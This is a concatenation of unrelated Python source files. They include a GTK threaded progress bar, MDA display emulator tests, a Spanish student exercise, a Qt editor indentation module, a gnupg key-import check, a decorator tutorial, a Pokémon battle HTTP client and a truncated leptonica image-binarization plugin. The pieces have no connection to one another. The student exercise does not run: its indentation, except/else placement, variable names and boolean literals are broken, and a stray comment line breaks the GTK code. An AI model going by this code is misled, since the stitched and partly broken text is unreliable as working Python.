#       along with this program; if not, write to the Free Software
#       Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
#       MA 02110-1301, USA.
import gtk, time
import threading
import thread
import gobject
#Iniciando el hilo sin usarlo
gtk.gdk.threads_init()
#La clase App hereda threading.Thread
class App(threading.Thread):
    def __init__(self):
         #Método constructor, asociando los widgets
        self.glade_file = "progreso.glade"
        self.glade = gtk.Builder()
        self.glade.add_from_file(self.glade_file)
        self.window1 = self.glade.get_object('window1')
        self.togglebutton1 = self.glade.get_object('togglebutton1')
        self.button1 = self.glade.get_object('button1')
        self.progressbar1 = self.glade.get_object('progressbar1')
        self.new_val = 0.0
        self.rango =60
        #Definiendo el valor inicial de la barra de proceso, definiendo los     saltos en 0.1
        self.progressbar1.set_fraction(self.new_val)
        self.progressbar1.set_pulse_step(0.1)
        self.window1.connect("destroy",self.on_window1_destroy)
        self.button1.connect('clicked', self.on_button1_clicked)
        self.togglebutton1.connect('toggled',self.on_togglebutton1_toggled)
        #Iniciando el hilo en el constructor
        threading.Thread.__init__(self)
        self.window1.show_all()

    def __iteracion__(self):
         #Iteración en segundos cambiando el valor en la barra de progreso.
        for i in range(self.rango):
            if self.togglebutton1.get_active() == True:
                self.new_val = self.progressbar1.get_fraction() + 0.01
                if self.new_val > 1.0:
                    self.new_val = 0.0
                    self.togglebutton1.set_active(False)
                    break
                else:
                    time.sleep(1)
                    self.x = self.new_val*100
                    self.progressbar1.set_text("%s" %self.x)
                    self.progressbar1.set_fraction(self.new_val)
            else:
                return

    def on_togglebutton1_toggled(self,*args):
        #Si cambia el evento en el boton biestado se inicia la iteración entre
        los hilos.
        variable = self.togglebutton1.get_active()
        self.rango = 100
        if variable == True:
            lock = thread.allocate_lock()
            lock.acquire()
            thread.start_new_thread( self.__iteracion__, ())
            lock.release()
        else:
            #Se detiene la barra de progreso
            self.progressbar1.set_fraction(self.new_val)
            self.progressbar1.set_text("%s" %self.x)




import unittest

from pyxt.mda import *
from pyxt.chargen import CharacterGeneratorMock

class MDATests(unittest.TestCase):
    def setUp(self):
        self.cg = CharacterGeneratorMock(width = 9, height = 14)
        self.mda = MonochromeDisplayAdapter(self.cg)
        
        # Hijack reset so it doesn't call into Pygame during the tests.
        self.reset_count = 0
        self.mda.reset = self.reset_testable
        
    def reset_testable(self):
        self.reset_count += 1
        
    def test_ports_list(self):
        self.assertEqual(self.mda.get_ports_list(), [0x03B0, 0x03B1, 0x03B2, 0x03B3,
                                                     0x03B4, 0x03B5, 0x03B6, 0x03B7,
                                                     0x03B8, 0x03B9, 0x03BA, 0x03BB])
        
    def test_get_memory_size(self):
        self.assertEqual(self.mda.get_memory_size(), 4096)
        
    def test_initial_state(self):
        self.assertEqual(self.mda.control_reg, 0x00)
        self.assertEqual(self.mda.control_reg, 0x00)
        self.assertEqual(self.mda.screen, None)
        self.assertEqual(self.mda.char_generator, self.cg)
        self.assertEqual(len(self.mda.video_ram), 4096)
        
    def test_mem_write_byte_updates_video_ram(self):
        self.mda.mem_write_byte(0x0000, 0x41)
        self.assertEqual(self.mda.video_ram[0x0000], 0x41)
        
    def test_mem_write_byte_calls_char_generator_top_left(self):
        self.mda.mem_write_byte(0x0000, 0x41)
        self.assertEqual(self.cg.last_blit, (None, (0, 0), 0x41, MDA_GREEN, MDA_BLACK))
        
    def test_mem_write_byte_calls_char_generator_bottom_right(self):
        self.mda.mem_write_byte(3998, 0xFF)
        self.assertEqual(self.cg.last_blit, (None, (711, 336), 0xFF, MDA_GREEN, MDA_BLACK))
        
    def test_mem_write_byte_char_before_attribute(self):
        self.mda.mem_write_byte(3998, 0xFF)
        self.assertEqual(self.cg.last_blit, (None, (711, 336), 0xFF, MDA_GREEN, MDA_BLACK))
        self.mda.mem_write_byte(3999, MDA_ATTR_INTENSITY)
        self.assertEqual(self.cg.last_blit, (None, (711, 336), 0xFF, MDA_BRIGHT_GREEN, MDA_BLACK))
        
    def test_mem_write_byte_attribute_before_char(self):
        self.mda.mem_write_byte(3999, MDA_ATTR_INTENSITY)
        self.assertEqual(self.cg.last_blit, (None, (711, 336), 0x00, MDA_BRIGHT_GREEN, MDA_BLACK))
        self.mda.mem_write_byte(3998, 0xFF)
        self.assertEqual(self.cg.last_blit, (None, (711, 336), 0xFF, MDA_BRIGHT_GREEN, MDA_BLACK))
        
    def test_mem_write_byte_write_off_screen(self):
        self.mda.mem_write_byte(4000, 0xFF)
        self.assertEqual(self.cg.last_blit, None)
        
    def test_mem_read_byte(self):
        self.mda.video_ram[77] = 0xA5
        self.assertEqual(self.mda.mem_read_byte(77), 0xA5)
        
    def test_mem_read_byte_off_screen(self):
        self.assertEqual(self.mda.mem_read_byte(4000), 0x00)
        
    @unittest.skip("We need to initialize Pygame exactly once at startup.")
    def test_reset_on_high_resolution_enable(self):
        self.assertEqual(self.reset_count, 0)
        
        self.mda.io_write_byte(0x3B8, 0x01)
        self.assertEqual(self.reset_count, 1)
        
        # Second write shouldn't call reset again.
        self.mda.io_write_byte(0x3B8, 0x01)
        self.assertEqual(self.reset_count, 1)
        
    def test_mem_write_word_at_top_left(self):
        self.mda.mem_write_word(0x0000, 0x0841) # 'A' with intensity.
        self.assertEqual(self.mda.video_ram[0x0000], 0x41)
        self.assertEqual(self.mda.video_ram[0x0001], 0x08)
        self.assertEqual(self.cg.last_blit, (None, (0, 0), 0x41, MDA_BRIGHT_GREEN, MDA_BLACK))
        
    def test_mem_write_word_at_bottom_right(self):
        self.mda.mem_write_word(3998, 0x085A) # 'Z' with intensity.
        self.assertEqual(self.mda.video_ram[3998], 0x5A)
        self.assertEqual(self.mda.video_ram[3999], 0x08)
        self.assertEqual(self.cg.last_blit, (None, (711, 336), 0x5A, MDA_BRIGHT_GREEN, MDA_BLACK))
        
    def test_mem_write_word_at_bottom_right_just_past(self):
        self.mda.mem_write_word(3999, 0xFF08) # 'Z' with intensity.
        self.assertEqual(self.mda.video_ram[3998], 0x00) # Should be unmodified.
        self.assertEqual(self.mda.video_ram[3999], 0x08)
        self.assertEqual(self.cg.last_blit, (None, (711, 336), 0x00, MDA_BRIGHT_GREEN, MDA_BLACK))
        
    def test_mem_read_word(self):
        self.mda.video_ram[0x0000] = 0x41
        self.mda.video_ram[0x0001] = 0x08
        self.assertEqual(self.mda.mem_read_word(0x0000), 0x0841)
        
    def test_mem_read_word_just_past_the_end(self):
        self.mda.video_ram[3998] = 0x12
        self.mda.video_ram[3999] = 0x34
        self.assertEqual(self.mda.mem_read_word(3999), 0x0034)
        
    def test_horizontal_retrace_toggles(self):
        self.assertEqual(self.mda.io_read_byte(0x3BA), 0xF0)
        self.assertEqual(self.mda.io_read_byte(0x3BA), 0xF1)
        self.assertEqual(self.mda.io_read_byte(0x3BA), 0xF0)
        
    def test_current_pixel_updates_on_status_read(self):
        self.assertEqual(self.mda.current_pixel, [0, 0])
        self.mda.io_read_byte(0x3BA)
        self.assertEqual(self.mda.current_pixel, [1, 0])
        
    def test_current_pixel_wraps_right(self):
        self.mda.current_pixel = [719, 0]
        self.mda.io_read_byte(0x3BA)
        self.assertEqual(self.mda.current_pixel, [0, 1])
        
    def test_current_pixel_wraps_bottom(self):
        self.mda.current_pixel = [719, 349]
        self.mda.io_read_byte(0x3BA)
        self.assertEqual(self.mda.current_pixel, [0, 0])
        
import urllib2


def sumaDos():
    print 10*20
def division(a,b):
    result=a/b
    print result

def areatriangulo(base,altura):
    result2=(base*altura)/2
    print result2

def cast():
    lista=[1,2,3,"hola"]
    tupla=(1,2,3)
    diccinario={"key1":"Diego","key2":"Piqui","key3":"Chuy"}
    for k,v  in diccionario:
        print "%s %s" % (k,v)
        
    


class Estudiante(object):
def __init__(self, nombre, edad):
        self.nombre=nombre
        self.edad=edad

def hola(self):
    return self.nombre
def esMayor(self):
    if self.edad>=18:
        return true
    else:
        return false
def EXCEPTION():
    try:
        3/0
        except Exception:
            print "error"
def main():
    e=Estudiante("Diego",22)
    print"Hola %s" % e.hola()
    if e.esMayor():
        print"Es mayor de edad"
        else:
            print"Es menor de edad"

    contador = 0
    while contador <=10:
        print contador
        contador +=1

EXCEPTION():
def getWeb():
    try:
        web=urllib2.urlopen("http://itjiquilpan.edu.mx/")
        print web.read()
        web.close()
        except urllib2.HTTPError, e:
            print e

        except urllib2.URLError as e:
            print e
def main():
   
    cast()
    

if __name__=="__main__":
    main()
    


    



"""Module computes indentation for block
It contains implementation of indenters, which are supported by katepart xml files
"""

import logging

logger = logging.getLogger('qutepart')


from PyQt4.QtGui import QTextCursor


def _getSmartIndenter(indenterName, qpart, indenter):
    """Get indenter by name.
    Available indenters are none, normal, cstyle, haskell, lilypond, lisp, python, ruby, xml
    Indenter name is not case sensitive
    Raise KeyError if not found
    indentText is indentation, which shall be used. i.e. '\t' for tabs, '    ' for 4 space symbols
    """
    indenterName = indenterName.lower()

    if indenterName in ('haskell', 'lilypond'):  # not supported yet
        logger.warning('Smart indentation for %s not supported yet. But you could be a hero who implemented it' % indenterName)
        from qutepart.indenter.base import IndentAlgNormal as indenterClass
    elif 'none' == indenterName:
        from qutepart.indenter.base import IndentAlgBase as indenterClass
    elif 'normal' == indenterName:
        from qutepart.indenter.base import IndentAlgNormal as indenterClass
    elif 'cstyle' == indenterName:
        from qutepart.indenter.cstyle import IndentAlgCStyle as indenterClass
    elif 'python' == indenterName:
        from qutepart.indenter.python import IndentAlgPython as indenterClass
    elif 'ruby' == indenterName:
        from qutepart.indenter.ruby import IndentAlgRuby as indenterClass
    elif 'xml' == indenterName:
        from qutepart.indenter.xmlindent import IndentAlgXml as indenterClass
    elif 'haskell' == indenterName:
        from qutepart.indenter.haskell import IndenterHaskell as indenterClass
    elif 'lilypond' == indenterName:
        from qutepart.indenter.lilypond import IndenterLilypond as indenterClass
    elif 'lisp' == indenterName:
        from qutepart.indenter.lisp import IndentAlgLisp as indenterClass
    elif 'scheme' == indenterName:
        from qutepart.indenter.scheme import IndentAlgScheme as indenterClass
    else:
        raise KeyError("Indenter %s not found" % indenterName)

    return indenterClass(qpart, indenter)


class Indenter:
    """Qutepart functionality, related to indentation

    Public attributes:
        width           Indent width
        useTabs         Indent uses Tabs (instead of spaces)
    """
    _DEFAULT_INDENT_WIDTH = 4
    _DEFAULT_INDENT_USE_TABS = False

    def __init__(self, qpart):
        self._qpart = qpart

        self.width = self._DEFAULT_INDENT_WIDTH
        self.useTabs = self._DEFAULT_INDENT_USE_TABS

        self._smartIndenter = _getSmartIndenter('normal', self._qpart, self)

    def setSyntax(self, syntax):
        """Choose smart indentation algorithm according to syntax"""
        self._smartIndenter = self._chooseSmartIndenter(syntax)

    def text(self):
        """Get indent text as \t or string of spaces
        """
        if self.useTabs:
            return '\t'
        else:
            return ' ' * self.width

    def triggerCharacters(self):
        """Trigger characters for smart indentation"""
        return self._smartIndenter.TRIGGER_CHARACTERS

    def autoIndentBlock(self, block, char = '\n'):
        """Indent block after Enter pressed or trigger character typed
        """
        cursor = QTextCursor(block)
        currentText = block.text()
        spaceAtStartLen = len(currentText) - len(currentText.lstrip())
        currentIndent = currentText[:spaceAtStartLen]
        indent = self._smartIndenter.computeIndent(block, char)
        if indent is not None and indent != currentIndent:
            self._qpart.replaceText(block.position(), spaceAtStartLen, indent)

    def onChangeSelectedBlocksIndent(self, increase, withSpace=False):
        """Tab or Space pressed and few blocks are selected, or Shift+Tab pressed
        Insert or remove text from the beginning of blocks
        """
        def blockIndentation(block):
            text = block.text()
            return text[:len(text) - len(text.lstrip())]

        def cursorAtSpaceEnd(block):
            cursor = QTextCursor(block)
            cursor.setPosition(block.position() + len(blockIndentation(block)))
            return cursor

        def indentBlock(block):
            cursor = cursorAtSpaceEnd(block)
            cursor.insertText(' ' if withSpace else self.text())

        def spacesCount(text):
            return len(text) - len(text.rstrip(' '))

        def unIndentBlock(block):
            currentIndent = blockIndentation(block)

            if currentIndent.endswith('\t'):
                charsToRemove = 1
            elif withSpace:
                charsToRemove = 1 if currentIndent else 0
            else:
                if self.useTabs:
                    charsToRemove = min(spacesCount(currentIndent), self.width)
                else:  # spaces
                    if currentIndent.endswith(self.text()):  # remove indent level
                        charsToRemove = self.width
                    else:  # remove all spaces
                        charsToRemove = min(spacesCount(currentIndent), self.width)

            if charsToRemove:
                cursor = cursorAtSpaceEnd(block)
                cursor.setPosition(cursor.position() - charsToRemove, QTextCursor.KeepAnchor)
                cursor.removeSelectedText()

        cursor = self._qpart.textCursor()

        startBlock = self._qpart.document().findBlock(cursor.selectionStart())
        endBlock = self._qpart.document().findBlock(cursor.selectionEnd())
        # If end is positioned in the beginning of a block, do not indent this
        # block, since no text is selected in it (beginning of line)
        if endBlock.position()==cursor.selectionEnd():
            endBlock=endBlock.previous()

        indentFunc = indentBlock if increase else unIndentBlock

        if startBlock != endBlock:  # indent multiply lines
            stopBlock = endBlock.next()

            block = startBlock

            with self._qpart:
                while block != stopBlock:
                    indentFunc(block)
                    block = block.next()

            newCursor = QTextCursor(startBlock)
            newCursor.setPosition(endBlock.position() + len(endBlock.text()), QTextCursor.KeepAnchor)
            self._qpart.setTextCursor(newCursor)
        else:  # indent 1 line
            indentFunc(startBlock)

    def onShortcutIndentAfterCursor(self):
        """Tab pressed and no selection. Insert text after cursor
        """
        cursor = self._qpart.textCursor()

        def insertIndent():
            if self.useTabs:
                cursor.insertText('\t')
            else:  # indent to integer count of indents from line start
                charsToInsert = self.width - (len(self._qpart.textBeforeCursor()) % self.width)
                cursor.insertText(' ' * charsToInsert)

        if cursor.positionInBlock() == 0:  # if no any indent - indent smartly
            block = cursor.block()
            self.autoIndentBlock(block, '')

            # if no smart indentation - just insert one indent
            if self._qpart.textBeforeCursor() == '':
                insertIndent()
        else:
            insertIndent()


    def onShortcutUnindentWithBackspace(self):
        """Backspace pressed, unindent
        """
        assert self._qpart.textBeforeCursor().endswith(self.text())

        charsToRemove = len(self._qpart.textBeforeCursor()) % len(self.text())
        if charsToRemove == 0:
            charsToRemove = len(self.text())

        cursor = self._qpart.textCursor()
        cursor.setPosition(cursor.position() - charsToRemove, QTextCursor.KeepAnchor)
        cursor.removeSelectedText()

    def onAutoIndentTriggered(self):
        """Indent current line or selected lines
        """
        cursor = self._qpart.textCursor()

        startBlock = self._qpart.document().findBlock(cursor.selectionStart())
        endBlock = self._qpart.document().findBlock(cursor.selectionEnd())

        if startBlock != endBlock:  # indent multiply lines
            stopBlock = endBlock.next()

            block = startBlock

            with self._qpart:
                while block != stopBlock:
                    self.autoIndentBlock(block, '')
                    block = block.next()
        else:  # indent 1 line
            self.autoIndentBlock(startBlock, '')

    def _chooseSmartIndenter(self, syntax):
        """Get indenter for syntax
        """
        if syntax.indenter is not None:
            try:
                return _getSmartIndenter(syntax.indenter, self._qpart, self)
            except KeyError:
                logger.error("Indenter '%s' is not finished yet. But you can do it!" % syntax.indenter)

        try:
            return _getSmartIndenter(syntax.name, self._qpart, self)
        except KeyError:
            pass

        return _getSmartIndenter('normal', self._qpart, self)

'''Manual check (not a discoverable unit test) for the key import,
   to identify problems with gnupg, gpg, gpg1, gpg2 and so on'''

import os
import shutil
from gnupg import GPG

def setup_keyring(keyring_name):
    '''Setup the keyring'''
    keyring_path = os.path.join("test", "outputdata", keyring_name)
    # Delete the entire keyring
    shutil.rmtree(keyring_path, ignore_errors=True)
    os.makedirs(keyring_path)
    gpg = GPG(gnupghome=keyring_path, gpgbinary="gpg")
    for key_name in ["key1_private", "key1_public"]:
        with open(os.path.join("test", "inputdata", key_name + ".txt"), "r") as keyfile:
            key_str = "".join(keyfile.readlines())
        import_result = gpg.import_keys(key_str)
        print("Import result:", type(import_result))
        print(import_result.__dict__)
        if import_result.count == 1 and len(set(import_result.fingerprints)) == 1:
            print("Got one import result")
    return gpg

CRYPTO = setup_keyring("keyringtest")
if CRYPTO:
    print("Ready", CRYPTO)
KEY_LIST = CRYPTO.list_keys(False)
NUM_KEYS = len(KEY_LIST) if KEY_LIST else 0
print("Number of public keys:", NUM_KEYS)
if NUM_KEYS < 1:
    print("ERROR: Number of keys should be 1, not", NUM_KEYS)
KEY_LIST = CRYPTO.list_keys(True)
NUM_KEYS = len(KEY_LIST) if KEY_LIST else 0
print("Number of private keys:", NUM_KEYS)
if NUM_KEYS < 1:
    print("ERROR: Number of keys should be 1, not", NUM_KEYS)

#!/usr/bin/python
"""
Since functions are function instances you can wrap them

Allow you to
- modify arguments
- modify function
- modify results
"""
call_count = 0
def count(func):
    def wrapper(*args, **kw):
        global call_count
        call_count += 1
        return func(*args, **kw)
    return wrapper

def hello():
	print 'Invoked hello'

hello = count(hello)  ## Now decorating hello to increment call count

hello()
print call_count
hello()
print call_count	    

"""
## Syntactic Sugar

>>> @count
... def hello():
...     print "Invoked hello"

equals

hello = count(hello)


## Syntactic Sugar 2
Dont add parens to the decorator
>>> @count()
... def hello():
...     print "Invoked hello"
... 
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: count() takes exactly 1 argument (0 given)
>>> 

##Decorator Template
def decorator(func_to_decorate):
	def wrapper(*args, **kwargs):
		# do something before invocation
		result = func_to_decorate(*args,**kwargs)
		# do something after invocation
		return result
	#update wrapper.__doc__ and .func_name
	# or functools.wraps	
	return wrapper	

##Decorators can also be classes, to have a class that Decorates
class decorator(object):
	def __init__(self, function):
		self.function = function
	def __call__(self, *args, **kw):
		# do something before invocation
		result = self.function(*args, **kw)
		# do something after
		return result	

##Decorators can also be classes 2, to have a instance that Decorates
class decorator(object):
	def __init__(self, function):
		self.function = function
	def __call__(self, *args, **kw):
		def wrapper(*args, **kw):
			# do something before invocation
			result = self.function(*args, **kw)
			# do something after
			return result	
		return wrapper

## The aboves lets you have an instance of a decorator that stores state
(rather than using global state)	

## Parameterized decorators (need 2 closures)
def limit(length):
	def decorator(function):
		def wrapper(*args, **kw):
			result = function(*args, **kw)
			result = result[:length]
			return result
		return wrapper
	return decorator			

>>> @limit(5)  ## Decorating the simple function echo with limit 5 as parameter
... def echo(foo):
...     return foo
... 
>>> echo ('123456')
'12345'
>>> 
Or you can use following as well , to limit the echo function with 3 as parameter
>>> echo = limit(3)(echo)
>>> echo ('123456')
'123'
>>> 

## Decorator Tidying

function attributes get mangled
>>> def echo2(input):
...     ###return input###  I used ### instead of 3  coz that was causing some error
...     return input
... 
>>> echo2.__doc__
'return input'
>>> echo2.func_name
'echo2'
>>> 
>>> echo3 = limit(3)(echo2)
>>> echo3.__doc__
>>> echo3.func_name
'wrapper'
>>> 

#Now to fix above define your limit decorator as below
def limit(length):
	def decorator(function):
		def wrapper(*args, **kw):
			result = function(*args, **kw)
			result = result[:length]
			return result
		wrapper.__doc__ = function.__doc__
		wrapper.func_name = function.func_name	
		return wrapper
	return decorator

>>> echo4 = limit(3)(echo2)
>>> echo4.__doc__
'return input'
>>> echo4.func_name
'echo2'
>>> 

#Decorator tidying (3) , using functools , more simple
import functools
def limit(length):
	def decorator(function):
		@functools.wraps(function)
		def wrapper(*args, **kw):
			result = function(*args, **kw)
			result = result[:length]
			return result
		#wrapper.__doc__ = function.__doc__
		#wrapper.func_name = function.func_name	
		return wrapper
	return decorator


Uses for decorator

- caching
- monkey patching stdio
- memoize
- jsonify
- logging time in function call
- change cwd
"""

def cwd_decorator(func):
	"""
	decorator to change cwd to directory containing rst for this function
	"""
	def wrapper(*args, **kw):
		cur_dir = os.getcwd()
		found = False
		for arg in sys.argv:
			if arg.endswith(".rst"):
				found = arg
				break
		if found:
			directory = os.path.dirname(arg)
			if directory:
				os.chdir(directory)
		data = func(*args, **kw)
		os.chdir(cur_dir)
		return data
	return wrapper					

"""
###
Properties
Call get/set methods via an instance attributes
class C(object):
	def getx(self):
		return self._x
	def setx(self, value):
		self._x = value
	def delx(self):
		del self._x
	x = property(getx, setx, delx, "I'm the 'x' property.")
	
from property.__doc__

"""				
import os
def find_files(base_dir, recurse=True):
	"""
	yeild files found in base_dir
	"""
	for name in os.listdir(base_dir):
		filepath = os.path.join(base_dir, name)
		if os.path.isdir(filepath) and recurse:
			for child in find_files(filepath, recurse):
				yield child
		else:
			yield filepath		



my_inf = float('Inf')
print 99999999 > my_inf
# False

my_neg_inf = float('-Inf')
print my_neg_inf < -99999999
# True

import xml.etree.ElementTree as ET
import requests
from flask import Flask
import batalha
import pokemon
import ataque

class Cliente:

	def __init__(self, execute = False, ip = '127.0.0.1', port = 5000, npc = False):
		self.ip = ip
		self.port = port
		self.npc = npc
		if (execute):
			self.iniciaBatalha()


	def writeXML(self, pkmn):
		#Escreve um XML a partir de um pokemon
		root = ET.Element('battle_state')
		ET.SubElement(root, "pokemon")
		poke = root.find('pokemon')

		ET.SubElement(poke, "name")
		poke.find('name').text = pkmn.getNome()

		ET.SubElement(poke, "level")
		poke.find('level').text = str(pkmn.getLvl())

		ET.SubElement(poke, "attributes")
		poke_att = poke.find('attributes')
		
		ET.SubElement(poke_att, "health")
		poke_att.find('health').text = str(pkmn.getHp())
		
		ET.SubElement(poke_att, "attack")
		poke_att.find('attack').text = str(pkmn.getAtk())
		
		ET.SubElement(poke_att, "defense")
		poke_att.find('defense').text = str(pkmn.getDefe())
		
		ET.SubElement(poke_att, "speed")
		poke_att.find('speed').text = str(pkmn.getSpd())
		
		ET.SubElement(poke_att, "special")
		poke_att.find('special').text = str(pkmn.getSpc())


		ET.SubElement(poke, "type")
		ET.SubElement(poke, "type")
		tipos = poke.findall('type')
		tipos[0].text = str(pkmn.getTyp1())
		tipos[1].text = str(pkmn.getTyp2())
		
		for i in range(0, 4):
			atk = pkmn.getAtks(i)
			if (atk is not None):
				ET.SubElement(poke, "attacks")
				poke_atk = poke.findall('attacks')

				ET.SubElement(poke_atk[-1], "id")
				poke_atk[-1].find('id').text = str(i + 1)

				ET.SubElement(poke_atk[-1], "name")
				poke_atk[-1].find('name').text = atk.getNome()
				
				ET.SubElement(poke_atk[-1], "type")
				poke_atk[-1].find('type').text = str(atk.getTyp())
				
				ET.SubElement(poke_atk[-1], "power")
				poke_atk[-1].find('power').text = str(atk.getPwr())
			
				ET.SubElement(poke_atk[-1], "accuracy")
				poke_atk[-1].find('accuracy').text = str(atk.getAcu())

				ET.SubElement(poke_atk[-1], "power_points")      
				poke_atk[-1].find('power_points').text = str(atk.getPpAtual())


		s = ET.tostring(root)
		return s

	def iniciaBatalha(self):
		pkmn = pokemon.Pokemon()
		xml = self.writeXML(pkmn)
		try:
			self.battle_state = requests.post('http://{}:{}/battle/'.format(self.ip, self.port), data = xml).text
		except requests.exceptions.ConnectionError:
			print("Não foi possível conectar ao servidor.")
			return None
		pkmn2 = pokemon.lePokemonXML(1, self.battle_state)
		self.batalha = batalha.Batalha([pkmn, pkmn2])
		if (self.npc): 
			self.batalha.pkmn[0].npc = True
			print("Eu sou um NPC")
		self.batalha.turno = 0
		self.batalha.display.showPokemon(self.batalha.pkmn[0])
		self.batalha.display.showPokemon(self.batalha.pkmn[1])
		return self.atualizaBatalha()

	def atualizaBatalha(self):
		self.batalha.AlternaTurno()
		root = ET.fromstring(self.battle_state)
		for i in range(0,2):
			pkmnXML = root[i]
			atksXML = root[i].findall('attacks')
			pkmn = self.batalha.pkmn[i]
			pkmn.setHpAtual(int(pkmnXML.find('attributes').find('health').text))

		self.batalha.showStatus()

		if (not self.batalha.isOver()):
			self.batalha.AlternaTurno()
			if (self.batalha.pkmn[self.batalha.turno].npc):
				id = self.batalha.EscolheAtaqueInteligente()
			else:
				id = self.batalha.EscolheAtaque()
			self.batalha.pkmn[0].getAtks(id).decreasePp()
			if (id == 4):
				self.battle_state = requests.post('http://{}:{}/battle/attack/{}'.format(self.ip, self.port, 0)).text
			else:
				self.battle_state = requests.post('http://{}:{}/battle/attack/{}'.format(self.ip, self.port, id + 1)).text
			self.simulaAtaque(id)
			self.atualizaBatalha()

		else: 
			self.batalha.showResults()

		return 'FIM'

	def sendShutdownSignal(self):
		requests.post('http://{}:{}/shutdown'.format(self.ip, self.port))

	def simulaAtaque(self, idCliente):
		disp = self.batalha.display
		root = ET.fromstring(self.battle_state)

		pkmnCXML = root[0]
		pkmnC = self.batalha.pkmn[0]

		pkmnSXML = root[1]
		pkmnS = self.batalha.pkmn[1]
		atksXML = pkmnSXML.findall('attacks')
		idServidor = self.descobreAtaqueUsado(atksXML, pkmnS)

		if (int(pkmnSXML.find('attributes').find('health').text) > 0):

			if (idCliente != 4):
				if (idServidor != 4):

					dmg = pkmnS.getHpAtual() - int(pkmnSXML.find('attributes').find('health').text)
					if (dmg == 0):
						disp.miss(pkmnC, pkmnS, pkmnC.getAtks(idCliente))
					else:
						disp.hit(pkmnC, pkmnS, pkmnC.getAtks(idCliente), dmg)

					dmg = pkmnC.getHpAtual() - int(pkmnCXML.find('attributes').find('health').text)
					if (dmg == 0):
						disp.miss(pkmnS, pkmnC, pkmnS.getAtks(idServidor))
					else:
						disp.hit(pkmnS, pkmnC, pkmnS.getAtks(idServidor), dmg)

				else:
					dmgStruggle = pkmnC.getHpAtual() - int(pkmnCXML.find('attributes').find('health').text)

					dmg = pkmnS.getHpAtual() - int(pkmnSXML.find('attributes').find('health').text) + round(dmgStruggle / 2, 0)
					if (dmg == 0):
						disp.miss(pkmnC, pkmnS, pkmnC.getAtks(idCliente))
					else:
						disp.hit(pkmnC, pkmnS, pkmnC.getAtks(idCliente), dmg)

					disp.hit(pkmnS, pkmnC, pkmnS.getAtks(idServidor), dmgStruggle)
					disp.hitSelf(pkmnS, round(dmgStruggle / 2, 0))

			else:
				if (idServidor != 4):
					dmgStruggle = pkmnS.getHpAtual() - int(pkmnSXML.find('attributes').find('health').text)

					disp.hit(pkmnC, pkmnS, pkmnC.getAtks(idCliente), dmgStruggle)
					disp.hitSelf(pkmnC, round(dmgStruggle / 2, 0))

					dmg = pkmnC.getHpAtual() - int(pkmnCXML.find('attributes').find('health').text) + round(dmgStruggle / 2, 0)
					if (dmg == 0):
						disp.miss(pkmnS, pkmnC, pkmnS.getAtks(idServidor))
					else:
						disp.hit(pkmnS, pkmnC, pkmnS.getAtks(idServidor), dmg)

				else:
					print('Ambos usam e se machucam com Struggle!')

		else:

			if (idCliente != 4):

				dmg = pkmnS.getHpAtual() - int(pkmnSXML.find('attributes').find('health').text)
				if (dmg == 0):
					disp.miss(pkmnC, pkmnS, pkmnC.getAtks(idCliente))
				else:
					disp.hit(pkmnC, pkmnS, pkmnC.getAtks(idCliente), dmg)

			else:
				dmgStruggle = pkmnC.getHpAtual() - int(pkmnCXML.find('attributes').find('health').text)

				disp.hit(pkmnC, pkmnS, pkmnC.getAtks(idServidor), dmgStruggle * 2)
				disp.hitSelf(pkmnC, round(dmgStruggle, 0))

	def descobreAtaqueUsado(self, atksXML, pkmn):
		for i in range(0, len(atksXML)):
			id = int(atksXML[i].find('id').text) - 1 
			ppXML = int(atksXML[i].find('power_points').text)
			pp = pkmn.getAtks(id).getPpAtual()

			if (pp != ppXML):
				pkmn.getAtks(id).decreasePp()
				return id

		return id








# -*- coding: utf-8 -*-
"""
nidaba.plugins.leptonica
~~~~~~~~~~~~~~~~~~~~~~~~

Plugin accessing `leptonica <http://leptonica.com>`_ functions.

This plugin requires a liblept shared object in the current library search
path. On Debian-based systems it can be installed using apt-get

.. code-block:: console

    # apt-get install libleptonica-dev

Leptonica's APIs are rather unstable and may differ significantly between
versions. If this plugin fails with weird error messages or workers are just
dying without discernable cause please submit a bug report including your
leptonica version.
"""

from __future__ import unicode_literals, print_function, absolute_import

import ctypes

from nidaba import storage

from nidaba.celery import app
from nidaba.tasks.helper import NidabaTask
from nidaba.nidabaexceptions import (NidabaInvalidParameterException,
                                     NidabaLeptonicaException,
                                     NidabaPluginException)

leptlib = 'liblept.so'


def setup(*args, **kwargs):
    try:
        ctypes.cdll.LoadLibrary(leptlib)
    except Exception as e:
        raise NidabaPluginException(e.message)


@app.task(base=NidabaTask, name=u'nidaba.binarize.sauvola',
          arg_values={'whsize': 'int', 'factor': (0.0, 1.0)})
def sauvola(doc, method=u'sauvola', whsize=10, factor=0.35):
    """
    Binarizes an input document utilizing Sauvola thresholding as described in
    [0]. Expects 8bpp grayscale images as input.

    [0] Sauvola, Jaakko, and Matti Pietikäinen. "Adaptive document image
    binarization." Pattern recognition 33.2 (2000): 225-236.

    Args:
        doc (unicode): The input document tuple.
        method (unicode): The suffix string appended to all output files
        whsize (int): The window width and height that local statistics are
                      calculated on are twice the value of whsize. The minimal
                      value is 2.
        factor (float): The threshold reduction factor due to variance. 0 =<
                        factor < 1.

    Returns:
        (unicode, unicode): Storage tuple of the output file

    Raises:
        NidabaInvalidParameterException: Input parameters are outside the valid
                                         range.
    """
    input_path = storage.get_abs_path(*doc)
    output_path = storage.insert_suffix(input_path, method, unicode(whsize),
                                        unicode(factor))
    lept_sauvola(input_path, output_path, whsize, factor)
    return storage.get_storage_path(output_path)


def lept_sauvola(image_path, output_path, whsize=10, factor=0.35):
    """
    Binarizes an input document utilizing Sauvola thresholding as described in
    [0]. Expects 8bpp grayscale images as input.

    [0] Sauvola, Jaakko, and Matti Pietikäinen. "Adaptive document image
    binarization." Pattern recognition 33.2 (2000): 225-236.

    Args:
        image_path (unicode): Input image path
        output_path (unicode): Output image path
        whsize (int): The window width and height that local statistics are
                      calculated on are twice the value of whsize. The minimal
                      value is 2.
        factor (float): The threshold reduction factor due to variance. 0 =<
                        factor < 1.

    Raises:
        NidabaInvalidParameterException: Input parameters are outside the valid
                                         range.
    """

    if whsize < 2 or factor >= 1.0 or factor < 0:
        raise NidabaInvalidParameterException('Parameters ({}, {}) outside of valid range'.format(whsize, factor))
    try:
        lept = ctypes.cdll.LoadLibrary(leptlib)
    except OSError as e:
        raise NidabaLeptonicaException('Loading leptonica failed: ' +
                                       e.message)
    pix = ctypes.c_void_p(lept.pixRead(image_path.encode('utf-8')))
    opix = ctypes.c_void_p()
